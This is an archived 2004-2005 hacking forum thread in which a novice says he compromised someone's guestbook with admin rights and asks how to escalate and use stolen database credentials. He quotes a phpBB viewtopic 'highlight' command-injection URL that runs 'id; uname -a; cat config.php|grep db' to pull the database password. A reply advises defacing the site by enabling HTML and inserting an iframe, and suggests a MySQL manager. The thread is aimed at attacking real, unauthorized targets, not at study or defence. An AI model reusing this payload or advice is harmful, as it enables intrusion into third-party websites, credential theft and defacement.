 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 138
 Members: 0
 Total: 138
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Tons Of Questions |
|
 Posted: Wed Dec 29, 2004 1:32 pm |
 |
|
| Injector |
| Active user |
 |
|
| Joined: Dec 29, 2004 |
| Posts: 49 |
|
|
|
 |
|
 |
|
Question 1
Sorry I'm not so good at injection and I really am trying to learn. I was able to get inside a guestbook with admin rights. And now I want to write some php so i could climb up to the main index page but everytime I write I get this error. | Code: | Warning: fopen(./templates/url.php): failed to open stream: Permission denied in /home/srath/public_html/guest/lib/admin.class.php on line 180
Warning: fwrite(): supplied argument is not a valid stream resource in /home/srath/public_html/guest/lib/admin.class.php on line 181
Warning: fclose(): supplied argument is not a valid stream resource in /home/srath/public_html/guest/lib/admin.class.php on line 187 |
Is there anyway I could bypass this or something or is there any other way else i could inject some codes?
-----------------------------------------
Question 2
I used this exploit
| Code: | | http: // [target]/forum/viewtopic.php? p=123*highlight = % 2527. $ poster = % 60$ls%60. % 2527*ls=id; uname%20-a; cat%20config.php|grep%20db |
And I got this "kdihssad9)\b#i" so I already know that this is the database password. I also did this to get the dbname. So I already got the dbname and dbpassword. I tried logging in using "kdihssad9" and the username but it dint work. So my question is how do I use the dbname and dbpasswd? sorry if this is abit noobish, my apologies. |
|
|
|
|
|
|
|
|
| Posted: Fri Dec 31, 2004 6:25 pm |
|
|
| Injector |
| Active user |
|
|
| Joined: Dec 29, 2004 |
| Posts: 49 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Jan 13, 2005 12:09 pm |
|
|
| qr4t |
| Regular user |
 |
|
| Joined: Nov 21, 2004 |
| Posts: 11 |
| Location: Estonia |
|
|
|
|
|
|
|
|
|
|
| Posted: Mon Feb 28, 2005 2:30 am |
|
|
| Srat |
| Beginner |
|
|
| Joined: Feb 28, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
Question 1:
The user runing the guestbook dont have enough permissions to write into the template script, so forget it, the best u can do for a deface is change the HTML Enable On and insert some HTML like an Iframe or somethin
Q2:
U need a MySQL Manager |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
